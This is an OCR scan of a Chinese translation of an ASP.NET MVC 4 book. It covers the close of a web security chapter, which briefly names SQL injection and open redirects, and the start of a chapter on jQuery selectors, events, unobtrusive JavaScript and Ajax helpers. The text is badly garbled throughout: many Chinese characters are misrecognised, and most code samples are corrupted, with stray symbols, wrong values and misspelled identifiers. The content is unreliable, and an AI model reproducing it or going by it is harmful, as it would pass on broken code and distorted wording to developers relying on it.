保证 应 用 程序 的 安全 性 不 是 一 跃 而 就 的 ， 只 有 单方 面 考虑 是 不 够 的 ， 而 应 该 把 安全 性 
问题 放 在 应 用 程序 的 整个 开发 过 程 中 以 及 应 用 程序 的 所 有 组 件 中 来 考虑 。 如 果 应 用 程序 允 
许 SQL 注入 攻击 ,那么 对 数据 库 进 行 再 好 的 防御 也 不 能 保障 数据 库 的 安全 性 ; 如 果 攻 击 者 
能 够 利用 像 开 放 重 定 癌 一 样 的 攻击 手段 哄 驴 用 户 交 出 密码 ， 那 么 严格 的 用 户 管理 就 会 土 朋 
瓦解 。 计 算 机 安全 专家 推荐 使 用 一 个 称 为 深层 防御 (defense in depth) 的 策略 来 应 对 广泛 攻 
击 ， 这 个 术语 起 源 十 军事 战略 ， 它 依托 于 分 层 的 防守 。 采 用 这 种 策略 ， 即 便 某 个 安全 区 域 
受到 攻击 ， 整 个 系统 也 不 会 受到 拖累 。 

Web 应 用 程序 中 的 安全 问题 总 是 可 以 归结 为 开发 人 员 一 方 的 简单 问题 : 不 当 的 假设 、 
错误 信息 及 缺乏 训练 等 。 本 章 竭 尽 所 能 地 介绍 了 攻击 者 的 攻击 方式 ， 以 便 开 发 人 员 对 它们 
有 更 多 的 了 解 。 古 人 云 :“ 知 己 知 彼 ， 百 战 不 列 ”， 因 此 保护 目 己 的 最 好 方式 束 是 了 解 本 人， 
了 解 目 己 。 
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Ajax 


本 章 主 要 内 容 

e 理解 jQuery 技术 

e Ajax 辅助 方法 的 用 法 
e jQuery 插件 的 用 法 


现在 创建 的 Web 应 用 程序 几乎 都 要 用 到 Ajax 技术 。 从 技术 角度 看 ，Ajax 代表 异步 
JavaScript 和 XML(Asynchronous JavaScript and XML，Ajax)。 在 实际 应 用 中 ， 它 代表 在 构 
建 具 有 和 良好 用 户 体验 的 啊 应 性 Web 应 用 程序 时 用 到 的 所 有 技术 。 尽管 啊 应 程序 有 些 时 需要 
- 些 异 步 通信 ， 但 是 微妙 的 动画 和 颜色 变化 更 可 以 使 程序 具有 啊 应 性 。 如 果 我 们 能 够 直观 
地 帮助 用 户 在 程序 内 部 做 出 正确 的 选择 ， 那 么 他 们 就 会 经 党 光顾 我 们 的 网 站 。 
ASPNET MVC 4 是 一 个 现代 Web 框架 ， 并 且 与 其 他 现代 Web 框架 一 样 ， 它 从 一 开始 
就 文 持 Ajax 技术 。Ajax 支持 的 核心 来 目 于 开源 的 JavaScript 库 jQuery。ASPNET MVC 4 
中 所 有 主要 的 Ajax 特性 要 么 是 基于 jQuery 构建 ， 要 么 是 扩展 的 jQuery 特性 。 
要 理解 ASPNET MVC 4 框架 中 Ajax 的 用 途 ， 首 先 青 要 学 习 jQuery。 


8.1 JQuery 


jQuery 的 口号 是 " 少 写 ， 多 做 "， 该 口号 完美 地 描述 了 jQuery 的 特点 。jQuery 的 API 简 
洁 而 强大 , 类 库 灵 活 而 轻便 。 最 重要 的 是 , jQuery 不 仅 文 持 所 有 现代 浏览 需 , 包括 正 、Firefox、 
Safari、Opera 和 Chrome 等 ， 还 可 以 在 编写 代码 和 浏览 句 API 神 突 时 隐藏 不 一 致 性 (和 错误 )。 
同时 ， 使 用 jQuery 进行 开发 不 仅 可 以 减少 代码 的 编写 量 ， 节 省 开发 时 间 ， 而 且 还 不 用 太 费 
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脑筋 。 

jQuery 是 一 个 开源 项 目 ， 是 目前 最 流行 的 JavaScript 库 之 一 。 在 jquery.com 网 站 上 能 
够 找到 它 的 最 新 下 载 版 本 、 文 档 和 插件 。 在 ASPNET MVC 应 用 程序 中 也 能 够 看 到 jQuery 
的 身影 。Microsoft 支持 jQuery， 当 创建 新 的 MVC 项 目 时 ，ASPNET MVC 的 项 目 模板 就 
会 把 jQuery 用 到 的 所 有 文件 放 在 Scripts 文件 夹 中 。 在 MVC 4 中 ， 我 们 通过 NuGet 添加 
jQuery 脚本 ， 这 样 当 出 现 新 版 本 的 jQuery 时 ， 我 们 就 可 以 很 容易 升级 脚本 。 

章 将 讲 到 ，MVC 框架 的 特性 是 建立 在 jQuery 基础 之 上 ， 例 如 客户 端 验 证 和 异步 回 

传 等 。 在 深入 介绍 这 些 ASPNET MVC 特性 之 前 ， 先 快速 浏览 一 下 jQuery 的 基本 特性 。 


8.1.1 jQuery 的 特性 


jQuery 擅长 在 HTML 文档 中 人 查找、 遍历 和 操纵 HIML 元 素 。 一 旦 找到 元 素 ，jQuery 
就 可 以 方便 地 在 其 上 进行 操作 ， 如 连接 事件 处 理 程 序 、 使 其 具有 动画 效果 以 及 创建 围绕 它 
的 Ajax 交互 等 。 本 节 后 面 将 话 细 介绍 jQuery 的 这 些 功 能 特性 ， 下 面 首 先 讨 论 jQuery 功能 
的 入 口 : jQuery 函数 。 


1. jQuery 函数 


jQuery 函数 对 象 可 以 用 来 访问 jQuery 特性 。 当 首次 使 用 jQuery 函数 时 ， 可 能 会 感到 
困惑 。 部 分 原因 可 能 是 这 个 称 为 jQuery 的 函数 用 $ 符 号 作为 别名 (因为 $ 符 号 只 需要 较 少 的 
输入 ， 它 在 JavaScript 语法 中 是 一 个 合法 的 函数 名 )。 更 令 人 困惑 的 是 我 们 几乎 可 以 问 $ 函 
数 传递 任何 类 型 的 参数 ， 并 且 该 函数 还 能 够 推导 出 传递 这 个 参数 的 意图 。 下 向 的 代码 展示 
了 jQuery 函数 的 一 些 典 型 应 用 : 
s{(function () ff 
$s ("#album-list img") .mouseover (function () 1{ 
$s (this) .animate({ height: "+=25", width: "+=25"” }) 
.animate({ height: -=295", Width: “一 = 一 2 1}); 
}); 
}); 
第 一 行 代码 调用 了 jQuery 函数 ($)， 并 同 其 中 传递 了 一 个 匿名 的 JavaScript 函数 作为 第 
-个 参数 : 
$(function () 1 
s("#album-list img") .mouseover (function () { 
$ (this) .animate({ height: "+=25", width: "+=25” }) 
.animate({ height: ‘=295", Width: “=25" 1}); 
}); 
}); 
当 传 递 一 个 函数 作为 第 一 个 参数 时 ，jQuery 就 会 假定 这 个 函数 是 要 在 浏览 占 完 成 构建 
(由 服务 器 提供 的 )HMTL 页 面 中 的 文档 对 象 模型 (Document Object Model，DOM) 后 立即 执 
行 ， 换 句 话说 ， 这 个 函数 在 服务 器 加 载 完 HIML 页 面 之 后 执行 。 这 样 就 可 以 安全 地 执行 函 
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数 中 与 DOM 冲突 的 脚本 ,我们 把 这 种 情况 称 为 “DOM 准备 ”事件 。 

第 二 行 代码 向 jQuery 函数 传递 一 个 字符 串 "#album-list img": 

s(function () { 

$s ("#album-l]ist img") .mouseover (function () { 
$s (this) .animate ({ height: "+=25", width: "+=25" }) 
.animate({ height: “=25", Width: “=295" }); 

wy 

jQuery 把 这 个 字符 串 解 释 为 选择 器 。 选 择 需 会 告知 jQuery 再 要 在 DOM 中 查找 的 元 素 。 
我 们 可 以 使 用 像 类 名 和 相对 位 置 这 样 的 特性 值 来 查找 元 素 。 第 二 行 代码 中 的 选择 器 告知 
jQuery 查找 id 值 为 "album-list" 的 元 素 中 的 所 有 图 像 。 

当 执 行 选 择 嚣 时, 它 会 返回 一 个 包含 零 个 或 多 个 匹配 元 素 的 封装 集 (wrapped set)。 我 们 
可 以 调用 其 他 任何 jQuery 方法 来 操作 封装 集中 的 元 素 。 例 如 ， 上 面 的 代码 调用 mouseover 
方法 为 与 选择 器 匹配 的 每 个 图 像 元 素 的 onmouseover 事件 连接 处 理 程序 。 

jQuery 利用 JavaScript 的 函数 式 编程 特性 ， 经 党 把 创建 的 或 传递 的 函数 作为 jQuery 方 
法 的 参数 。 例如，mouseover 方法 知道 在 不 用 考虑 所 使 用 浏览 器 的 版 本 的 情况 下 ， 如 何 为 
onmouseover 事件 连接 事件 处 理 程 序 , 但 是 它 不 知道 在 事件 触发 时 程序 员 想 要 执行 的 操作 。 
于 是 为 了 表达 事件 触发 时 想 进 行 的 处 理 ， 就 同 mouseover 方法 传递 了 一 个 包含 事件 处 理 代 
码 的 函数 参数 : 

$s {function () f 

s("#album-list img") .mouseover (function () { 
s(this) .animate({ height: '+=25'"', width: '+=25"' }) 
.animate({ height: '-=25', width: '-=25" }):; 

WE 

上 面 的 例子 实现 了 在 触发 mouseover 事件 时 , 匹配 选择 右 的 img 元 素 会 产生 动画 效果 。 
在 上 面 代码 中 ， 之 所 以 使 用 this 关键 字 来 引用 要 做 动画 效果 的 元 素 ， 是 因为 this 指向 的 是 
触发 事件 的 元 素 。 注 意 代 码 第 一 次 将 元 素 传递 给 jQuery 函数 的 方法 ($(this))。jQuery 将 该 
参数 看 成 一 个 元 素 的 引用 参数 ， 并 返回 一 个 包含 有 该 元 素 的 封装 集 。 

- 且 将 茶 个 元 素 包 含 在 jQuery 封装 集中 ， 就 可 以 调用 jQuery 方法 (如 animate) 来 操纵 
这 个 元 素 。 示 例 中 的 代码 首先 将 图 像 放大 ( 宽 禹 增加 25 个 像素 )， 然 后 再 缩小 ( 宽 和 融 减 
小 25 个 像素 )。 

上 述 代 码 的 执行 效果 是 : 当 用 户 将 眼 标 移 癌 专辑 图 像 时 ， 他 们 会 看 到 图 像 先 变 大 再 变 
小 这 样 一 个 微妙 的 强调 效果 。 这 个 效果 是 应 用 程序 必需 的 吗 ? 不 是 ! 然而 ， 它 却 可 以 展示 
一 个 精美 优雅 的 外 观 。 用 户 定 会 喜欢 。 

随 独 本 章 的 进展 , 会 看 到 越 来 越 多 的 特性 .下 面 首 先 详细 介绍 将 要 用 到 的 jQuery 特性 。 
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2. jQuery 选择 器 
选择 器 是 指 传递 给 jQuery 函数 的 、 用 来 在 DOM 中 选择 元 素 的 字符 串 。 前 面 用 到 的 字 
符 串 "#album-list img" 就 是 用 来 选择 <img> 标 签 的 。 作 为 选择 器 的 字符 串 看 起 来 像 层 琶 样 式 
表 (Cascading Style Sheet，CSS) 中 的 项 。jQuery 选择 器 的 语法 正 是 派生 于 CSS 3.0 选择 器 的 
语法 ， 并 在 其 基础 上 做 了 一 些 补 充 。 表 8-1 列举 了 jQuery 代码 中 一 些 常 见 的 选择 器 。 
表 8-1 常见 的 选择 器 


例 子 意 义 
$("#header") 查找 id 值 为 "header" 的 元 素 
$(".editor-label") 查找 class 名 为 ".editor-label" 的 所 有 元 素 
$("div") 前 找 所 有 <div> 元 素 
$("#header div") 查找 id 值 为 "header" 元 素 的 所 有 后 代 <div> 元 素 
$("#header > div") 查找 id 值 为 "header" 元 素 的 所 有 子 <div> 元 素 
$("a:even") 查找 编号 为 侦 数 的 销 标 签 


从 表 8-1 的 最 后 一 行 可 以 看 出 ，jQuery 与 CSS 一 样 也 支持 伪 类 。 伪 类 既 可 以 用 来 选择 
偶数 或 奇数 编号 的 元 素 ， 也 可 以 用 来 选择 访问 过 的 链接 等 。 如果 想 查看 整个 CSS 选择 器 列 
表 ， 请 访问 http://www.w3.org/TR/css3-selectors/。 


3. jQuery 事件 


jQuery 的 另 一 个 优势 在 于 ， 它 提供 了 用 来 订阅 DOM 中 事件 的 API。 尽 管 使 用 一 个 通 
用 的 bind 函数 可 以 捕获 指定 名 称 的 任何 事件 ， 但 jQuery 也 为 一 般 的 事件 提供 了 专门 方法 ， 
比如 click、blur 和 submit。 像 之 前 提 过 的 那样 ， 可 以 通过 传 进 一 个 函数 来 告知 jQuery 在 事 
件 触 发 时 进行 的 处 理 。 传 进 的 函数 可 以 是 匿名 的 , 像 本 节 前 面 的 “.jQuery 函数 ”中 的 例子 ， 
也 可 以 是 一 个 作为 事件 处 理 程序 的 命名 函数 ， 如 以 下 代码 所 示 : 

$s ("#album-list img") .mouseover (function () I 

animateElement ($ (this)); 
}); 
function animateElement (element) { 


element.animate({ height: "+=25", width: "+=25" }) 
.animate({ height: -=25", Width: "=25" 1}); 


-日 选择 了 一 些 DOM 元 素 或 是 在 一 个 事件 处 理 程 序 内 ，jQuery 就 可 以 很 容易 地 操纵 
页 面 上 的 元 素 ， 读 取 或 设置 它们 的 特性 值 ， 添 加 或 移 除 它们 的 CSS 类 等 。 下 面 的 代 但 淘 示 
了 当 用 户 的 鼠标 移 过 元 素 时 ， 如 何 向 一 个 页 面 上 的 锚 标 签 添 加 或 从 中 删除 highlight 类 。 当 
用 户 在 标签 上 移动 鼠标 时 ， 锚 标签 就 会 改变 外 观 ( 假 如 有 一 个 合适 的 highlight 样式 设置 ): 


3 ("a") .mouseoVer (Eunction () I 
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$ (this}) .addClass ("highlight"™}); 

}} .mouseout (function () 1 
$5 (this) .removeClass ("highlight"); 

}); 

关于 上 面 的 代码 ， 需 要 注意 以 下 两 个 地 方 : 

e 代码 中 用 到 的 所 有 依赖 于 封装 集 的 jQuery 方法 , 像 mouseover 方法 , 都 返回 同样 的 
jQuery 封装 集 。 这 就 是 说 可 以 继续 在 选择 的 元 素 上 调用 jQuery 方法 ， 而 不 用 再 重 

e 许多 常用 操作 在 jQuery 中 都 有 与 其 对 应 的 捷径 方法 (shortcut)。 设 置 mouseover 和 
mouseout 效果 是 一 种 常见 的 操作 ， 切 换 样 式 类 型 也 是 一 种 常见 的 操作 。 可 以 使 用 
jQuery 捷径 方法 重 写 上 面 的 代码 段 ， 修 改 后 的 代码 如 下 : 

$(nan) .hover (function () 1{ 
$ (this) .toggleClass ("higqhl1ight") ; 

}); 


上 而 三 行 代码 非常 强大 一 一 这 也 正 是 jQuery 如 此 出 色 的 原因 所 在 。 
4. jQuery 和 Ajax 


jQuery 包含 了 问 Web 服务 器 回 发 异步 请 求 所 需要 的 所 有 功能 。 可 以 用 jQuery 来 生成 
POST 请 求 或 GET 请 求 ， 并 且 当 请 求 完 成 (或 出 现 错误 ) 时 jQuery 会 发 出 通知 。 尽 管 可 以 使 
用 jQuery 发 送 和 接受 XML 格式 的 数据 (毕竟 Ajax 中 的 和 代表 的 是 XML)， 但 本 章 后 面 将 
会 展示 ， 使 用 HIML、 文 本 或 JavaScript Object Notation(JSON) 格 式 的 数据 是 非常 竹 琐 的 。 
jQuery 使 Ajax 变 得 简单 。 

事实 上 ，jQuery 之 所 以 简化 了 许多 任务 ， 是 因为 它 已 经 改变 了 Web 开发 人 员 编 写 脚本 
代码 的 方式 。 
8.1.2 非 侵入 式 JavaScript 


在 Web 早期 阶段 ， 也 就 是 在 jQuery 出 现 以 前 ， 在 同一 个 文件 中 混杂 JavaScript 代码 和 
HTML 标记 是 非常 流行 的 做 法 。 将 JavaScript 代码 作为 某 个 特性 的 值 放 入 HIML 元 素 中 再 
正 第 不 过 了 。 您 可 能 见 过 下 面 这样 的 onclick 处 理 程 序 : 


<div onclick="jJavascript:alert{'click');">Testing, testing</div> 


当时 我 们 可 能 会 在 标记 中 先入 JavaScript 代码 ， 因 为 没有 更 简单 的 方法 可 以 用 来 捕获 
单 击 事件 。 尽 管 伐 入 的 JavaScript 代码 可 以 实现 事件 捕获 ， 但 是 这 样 的 代码 不 够 整洁 。jQuery 
改变 了 这 种 状况 ， 因 为 jQuery 提供 了 得 找 元 素 和 捕获 单 击 事件 的 更 好 方法 。 现 在 可 以 从 
HTML 特性 中 移 除 JavaScript 代码 了 。 事 实 上， 可 将 JavaScript 代码 与 HIML 完全 分 离 。 

非 侵 入 式 JavaScript(unobtrusive JavaScript) 很 好 地 实践 了 JavaScript 代码 和 标记 的 分 
离 。 可 将 所 有 需要 的 脚本 代码 打包 到 js 文件 中 。 如 果 碍 看 视图 的 源 代 码 ， 您 将 不 会 看 到 有 
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JavaScript 代 但 能 入 在 标记 中 。 即 使 得 看 视图 演 染 的 HIML 标记 ， 也 看 不 到 任何 JavaScript 
代码 ， 脚 本 留 下 的 唯一 痕迹 是 一 个 或 多 个 引用 JavaScript 文件 的 <script> 标 签 。 

我 们 可 能 已 经 发 现 非 侵入 式 JavaScript 之 所 以 具有 吸引 力 , 主要 是 因为 它 遵 循 了 MVC 
框架 设计 模式 所 提倡 的 关注 点 分 离 。 它 实现 了 内 容 显 示 ( 由 标记 实现 ) 和 交互 行为 (由 
JavaScript 实现 ) 的 分 离 。 除 此 之 外 ， 非 侵入 式 JavaScript 还 有 其 他 优势 。 例 如 ， 将 所 有 的 脚 
本 代码 保存 在 单独 的 可 下 载 文件 中 让 浏览 妖 能 够 在 本 地 缓存 脚本 文件 ， 从 而 提高 网 站 的 
性 能 。 

非 侵入 式 JavaScript 也 文 持 在 站 点 上 使 用 少 进 增强 (progressive enhancement) 的 策略 。 
渐进 增强 关注 的 是 传递 的 内 容 。 只 要 和 奉 看 内 容 的 设备 或 浏览 右 支 持 像 脚本 和 样式 表 这 样 的 
特性 ， 页 面 就 会 展现 更 高 级 的 内 容 ， 使 图 像 具 有 动画 效果 等 。Wikipedia 对 渐进 增强 有 一 个 
很 好 的 概述 ， 参 见 http://en.wikipedia.org/wiki/Progressive enhancement。 

ASPNET MVC 4 对 JavaScript 采 用 非 侵入 式 的 方法 ,框架 将 元 数据 放 入 HTML 特性 中 ， 
而 不 是 将 JavaScript 代 但 注入 视图 来 实现 某 种 功能 特性 ( 像 客 户 疹 验 证 )。 使 用 jQuery 技术 ， 
框架 能 够 查找 和 解释 元 数据 ， 然 后 将 行为 附加 到 所 有 使 用 外 部 脚本 文件 的 元 素 上 。 由 于 有 
了 非 侵 入 式 JavaScript 工作 ， 才 使 得 ASPNET MVC 的 Ajax 特性 支持 渐进 增强 。 如 果 用 户 
浏览 占 不 文 持 脚本 ， 访 问 的 站 点 也 仍然 会 正常 运作 ， 但 不 会 提供 好 的 功能 ， 像 客户 端 验 
i 

为 了 解 控 制 右 操作 中 的 非 侵入 式 JavaScript 的 工作 原理 , 下面 首 先 学 习 如 何在 MVC 应 
用 程序 中 使 用 jQuery。 

8.1.3 jQuery 的 用 法 


当 使 用 Visual Studio 项 目 模 板 创 建新 的 ASPNET MVC 项 目 时 ， 它 会 默认 生成 使 用 
jQuery 需要 的 所 有 内 容 。 每 个 新 项 目 都 包含 一 个 Scripts 文件 夹 ， 其 中 市 有 多 个 js 文件 ， 如 
图 8-1 所 示 。 


省 昌 -2O 和 外 ] 
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他 Scripts 
[0 _ref erences.]s 


EE 


0 jquery-1.6.2-vsdoc.js 
U0 jquery-1.6.2.js 
UD jquery-ui-1.8.11.s 


= 有 


LL jquery.unobtrusive-ajax.js 
0 Jquery.valrdate-vsdoc.ys 

[0 jquery.validate.js 

0 jquery.validate.unobtrusive,js 
0 knockout-2.0.0.debug.js 

0] knockout-2.0.0.js 


™ 
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jQuery 核心 库 是 一 个 名 为 jquery-<version>.js 的 文件 ， 编 写本 书 时 其 版 本 号 是 1.6.2。 
这 个 文件 中 包含 了 jQuery 源 代码 的 可 注释 版 本 。 

如 二 们 和 jQuery， 我 们 只 和 需 添加 一 个 script 标签 把 jQuery 脚本 文件 引用 到 我 们 的 页 面 
中 。 通 常情 况 下 ， 由 于 在 整个 应 用 程序 中 都 有 用 到 jQuery， 因 此 ， 我 们 会 把 这 个 script 标 
签 放 在 应 用 程序 的 布局 视图 中 。 最 简单 的 方法 是 使 用 如 下 所 示 的 代码 : 


<SCript src="~/Scripts/jquery-1.6.2.]s"></script> 


注意 ，ASPNET MVC 的 Razor 视图 引擎 会 把 这 里 的 ~ 符号 解析 为 当前 网 站 的 根 目 录 ， 
即便 它 出 现在 了 src 特性 中 。 另 外 一 个 值得 注意 的 地 方 是 ，HTML 5 中 不 需要 指定 类 型 


text/Javascript。 
1. 自 定义 脚本 


当 编写 目 定 义 的 JavaScript 代码 时 ， 我 们 可 以 把 这 些 代码 添加 到 脚本 目录 下 的 新 脚本 
文件 中 (除非 想 编写 侵入 性 JavaScript， 人 否则 直接 把 脚本 代码 嵌入 视图 中 ， 但 是 这 样 做 我 们 
可 能 会 失去 25 个 业绩 积分 )。 例 如 ， 我 们 可 以 利用 本 章 开始 部 分 的 代码 并 把 它 放 在 脚本 日 
录 下 的 MusicScripts.js 文件 中 。MusicScripts.js 文件 的 内 容 如 下 所 示 : 

$s (function () 1{ 

$s ("#album-list img") .mouseover (function () { 
$ (this) .animate({ height: "+=25", width: "+=25" }) 
-animate({ height: “=29", Width: “=295" }); 
上 ) 7 

}); 

回应 用 程序 中 添加 文件 MusicScripts.js 还 需要 另 一 个 script 标签 。 在 泻 染 的 文档 中 这 个 
script 标签 必须 出 现在 jQuery 的 script 标签 后 面 ， 因 为 MusicScripts.js 需要 jQuery 的 文 持 ， 
而 浏览 大 会 按照 脚本 在 文档 中 出 现 的 顺序 进行 加 载 。 如 果 脚 本 包含 了 整个 应 用 程序 要 使 用 
的 功能 ， 可 以 把 script 标签 放 在 _ Layout 视图 中 ,但 仍 需 放 在 jQuery 的 script 标签 之 后 。 在 
这 个 示例 中 ， 直 要 在 应 用 程序 的 首页 中 使 用 这 些 脚 本 ， 我 们 可 以 把 它 渗 加 到 控制 需 
HomeController 中 Index 视图 的 任何 位 置 ， 这 是 因为 视图 引擎 把 演 染 视图 的 内 容 放 在 了 页 
面 的 主体 中 并 且 在 jQuery 的 script 标签 之 后 。 

<div id="promotijon"> 

</div> 

<h3><em>Fresh</em> off the grill</h3> 

Qsection Scripts { 


<script src="~/Scripts/MoviesScripts.jJs")"></script> 
} 


2. 在 节点 中 放置 脚本 
回 输出 中 注入 脚本 的 另 一 种 方法 是 定义 用 来 放置 脚本 的 Razor 节 。 尽 管 我 们 可 以 添加 
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目 定 义 的 节 , 但 ASPNET MVC 4 应 用 程序 玲 认 的 _ Layonut 视图 中 包含 有 一 个 节 ， 我 们 可 以 
用 来 包含 依赖 jQuery 的 脚本 。 包 含 的 节 的 名 称 是 scripts， 它 出 现在 jQuery 加 载 后 ， 以 便 我 
们 的 脚本 依赖 于 jQuery。 
现在 可 以 在 引用 布局 的 任何 内 容 视 图 中 洪 加 脚本 节 ， 以 便 同 该 视图 的 头 部 注入 脚本 : 
Qsection scriptst 
<script src="~/Scripts/MusicSscripts.]js") 
></script> 


} 


上 面 介绍 的 方法 可 以 设置 脚本 标签 的 具体 位 置 ， 以 确保 需要 的 脚本 以 合适 的 顺序 出 现 。 
默认 情况 下 ,MVC 4 应 用 程序 中 的 _Layonut 视图 把 脚本 泻 染 在 页 面 底部 ,在 body 标签 关闭 
ra 

3. Scripts 目录 下 的 其 他 文件 


在 Scripts 目录 下 的 所 有 其 他 .js 文件 是 什么 呢 ? 除 jQuery 核心 库 外 ，Scripts 目录 中 还 

包含 两 个 jQuery 插件 : jQuery UI 和 jQuery 验证 。 这 些 扩展 增强 了 jQuery 核心 库 的 功能 ， 
章 后 面部 分 还 要 用 到 这 两 个 插件 。 注 意 这 两 个 插件 的 精简 版 本 。 

有 人 可 能 也 发 现 了 在 Scripts 中 还 存在 名 称 中 包含 “vsdoc” 的 文件 。 这 些 文件 是 专门 
协助 Visual Studio 2012 更 好 地 提供 智能 感知 功能 服务 的 。 在 程序 中 没 必要 直接 引用 这 些 文 
件 ,也 没 必要 把 它们 发 送 到 客户 端 。 如 果 我 们 在 references.js 中 引用 文件 , Visual Studio 2012 
会 目 动 发 现 这 些 文件 。_referencesjs 文件 定义 了 Visual Studio 使 用 的 隐 式 引用 来 获得 智能 
感知 功能 ， 我 们 可 以 通过 以 下 步骤 配置 该 文件 : Tools | Options | JavaScript | IntelliSense， 查 
找 隐 式 Web Reference Group 。 

目录 里 名 称 中 包含 “unobtrusive ”字样 的 文件 是 由 Microsoft 编写 的 。 这 些 非 侵 入 式 脚 
本 集成 了 jQuery 和 ASPNET MVC 框架 , 从 而 提供 了 前 面 提 到 的 非 侵 入 式 JavaScript 特性 。 
如 果 要 实现 ASPNET MVC 框架 的 Ajax 特性 ， 束 需要 使 用 这 些 文件 ,本 章 稍 后 将 介绍 这 些 
脚本 的 用 法 。 

到 目前 为 止 , 已经 介绍 了 jQuery 的 内 容 以 及 如 何在 应 用 程序 中 引用 脚本 ， 下 面 继续 介 
绍 ASPNET MVC 框架 直接 支持 的 Ajax 特性 。 

我 们 在 Scripts 目录 下 找到 的 另 一 个 脚本 是 Modernizr 脚本 。Modernizr 一 个 JavaScript 
库 ， 它 通过 改造 老 版 本 浏览 器 来 帮助 我 们 构建 富有 现代 气 且 的 应 用 程序 。 例 如 ，Modermizr 
的 一 个 重要 工作 就 是 在 老 版 本 浏览 堪 中 局 用 新 的 HIML 5 元 素 ( 比 如 header、 nav 和 menu)， 
而 这 些 老 版 本 浏览 器 ( 像 Internet Explorer 6) 本 身 不 文 持 HTML 5 元 素 。Modemizr 也 可 以 帮 
助 我 们 检测 特定 浏览 器 是 否 交 持 一 些 高 级 功能 ， 像 定位 位 置 (geolocation) 和 绘画 画布 
(drawing canvas)。 

最 后 ,我 们 会 在 Scripts 目录 下 发 现 Knockout JavaScript 脚本 库 。Knockonut 提供 了 数据 
绑 定 功能 , 这 一 功能 是 专门 为 那些 想 在 JavaScript 代码 和 客户 端 数据 上 使 用 模型 -视图 -视图 
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模型 (MVVM) 设 计 模 式 的 开发 人 员 而 设计 。 
8.2 Ajax 辅助 方法 


前 面 的 章节 已 经 介绍 了 ASPNET MVC 框架 中 的 HTML 辅助 方法 。 我 们 可 以 使 用 
HTML 辅助 方法 创建 表单 和 指 癌 控制 器 操作 的 链接 。 在 ASPNET MVC 框架 中 还 包含 一 组 
Ajax 辅助 方法 ,它们 也 可 以 用 来 创建 表单 和 指 癌 控制 硕 操 作 的 链接 ， 但 不 同 的 是 它们 是 异 
步 进行 的 。 当 使 用 这 些 辅助 方法 时 ， 不 用 编 与 任何 脚本 代 但 来 实现 程序 的 措 步 性 。 

在 后 台 ， 这 些 Ajax 辅助 方法 依赖 于 非 侵 入 式 MVC 的 jQuery 扩展 。 如 果 使 用 这 些 辅 
助 方法 ,我 们 就 需要 引入 脚本 文件 jquery.unobtrusive-ajax.js 以 便 添 加 jqueryunobsrusive-ajax 
脚本 。 值 得 注意 的 是 ，MVC 4 应 用 程序 默认 在 应 用 程序 的 Layout 视图 中 包含 这 个 脚本 。 
如 果 想 手动 包含 该 脚本 文件 ， 我 们 可 以 使 用 下 面 的 脚本 标签 : 

<Sscript Src="~ScTripts 门 duery-1.6.2.min.]js") 

></script> 

<script src="~/Scripts/Scripts/jquery.unobtrusive-ajax.min.js") 


></script> 
QRenderSection("scripts", required:false); 


8.2.1 Ajax 的 ActionLink 方法 


在 Razor 视图 中 ，Ajax 辅助 方法 可 以 通过 Ajax 属性 访问 。 与 HIML 辅助 方法 类 似 ， 
Ajax 属性 上 的 大 部 分 Ajax 辅助 方法 都 是 扩展 方法 (除了 AjaxHelper 类 型 之 外 )。 
Ajax 属性 的 ActionLink 方法 可 创建 一 个 具有 异步 行为 的 销 标 签 。 假 如 要 在 打开 的 页 面 
的 底部 为 MVC Music Store 添加 一 个 "daily deal" 链 接 ， 要 求 在 用 户 单 击 链 接 时 是 在 当前 页 
面 上 显示 打折 扣 专 辑 的 详细 信息 ， 而 不 是 在 一 个 新 页 面 中 显示 。 
为 了 实现 这 个 效果 ， 需 要 在 视图 "Views/Home/Index.cshtml" 中 己 有 专辑 列表 的 后 和 面 添 
加 如 下 代码 : 
<div id="dailydeal"™> 
QAjax.ActionLink ("Click here to see today's speciall!™, 
"DailyDeal™, 
new A]JjaxOptions! 
UpdateTargetId="dailydeal™, 
InsertionMode=InsertionMode.Replace, 
HttpMethod="GET" 


上) 
</div> 
ActionLink 方法 的 第 一 个 参数 指定 了 链接 文本 ， 第 二 个 参数 是 要 异步 调用 的 操作 的 名 
称 。 类 似 于 同名 的 HTML 辅助 方法 ，Ajax 辅助 方法 ActionLink 也 提供 了 各 种 重 载 版 本 ， 
用 来 传递 控制 嚣 名称、 路 由 值 和 HTML 特性 。 
对 于 HIML 辅助 方法 与 Ajax 辅助 方法 ,显著 不 同 的 是 AjaxOptions 参数 。 该 参数 指定 
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了 发 送 请 求 和 处 理 服 务 器 返回 的 结果 的 方式 。 参数 中 还 包括 用 来 处 理 错误 、 显 示 加 载 元 素 、 
显示 确认 对 话 框 等 的 选项 。 在 这 个 示例 中 ，AjaxOption 参数 的 选项 指定 了 要 使 用 来 自 服务 
需 的 啊 应 元 素来 葵 换 id 值 为 “dailydeal” 的 元 素 。 为 得 到 服务 器 的 啊 应 ， 震 要 在 控制 右 
HomeController 上 添加 一 个 DailyDeal 操作 : 


public ActionResult DalilyDeal () 


{ 
Var album = GetDailyDeal () ; 


return PartialView(" DailyDeal", album); 


} 


private Album GetDailyDeal () 
{ 
return storeDB.Albums 
.OrderByl(a => a.Price) 
.FI1rst(); 
} 
Ajax 操作 链接 的 目标 操作 的 返回 值 是 纯 文本 或 HTML。 在 这 个 示例 中 ， 将 通过 演 染 一 
个 部 分 视图 来 返回 HTML .下面 的 Razor 代码 就 在 项 目的 Views/Home 文件 夹 下 的 DailyDeal. 
cshtml 文件 中 。 


GAGmodel MVvcMusicStore .Models .Album 


<P> 
<img alt="QModel .Title”" src="Q@Model.AlbumArtUrl™" /> 


</p> 


<div id="album-details"> 
<p> 
<em>Artist:</em> 
QModel .Artist.Name 
</p> 
<p> 


<em>Price:</em> 
QSstring.Format ("{0:F}", Model .Price) 
</p> 
<P CTLass= button -> 
QHtm]l .ActionLink ("Add to cart™, "AddToCart™", 
“ShoppingcCart", new { id = Mode .AlbumlId |}, 
</p> 
</div> 


Li 3 


当 用 户 单 击 链 接 时 ， 就 会 向 控制 器 HomeController 的 DailyDeal 操作 发 送 一 个 异步 请 
求 。 一旦 操作 从 一 个 泻 染 的 视图 中 返回 了 HTML, 后 台 的 脚本 就 会 利用 返回 的 HTML 替换 
DOM 中 已 有 的 dailydeal 元 素 。 在 用 户 单 击 链接 之 前 ， 应 用 程序 首页 的 底部 如 图 8-2 所 示 。 
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Fresh ofi the orill 


| :mpu Sample Sampla Sampla Sample 
© © 人 © © 
| | | 
[he Best Li For Those [Let There Be Balls to the (testless and 
Men At Worl About To Rock Rocl Wal Wild 


About To Roc| 
Tree 
We Salute You 


Click here to see today'’s speciall! 


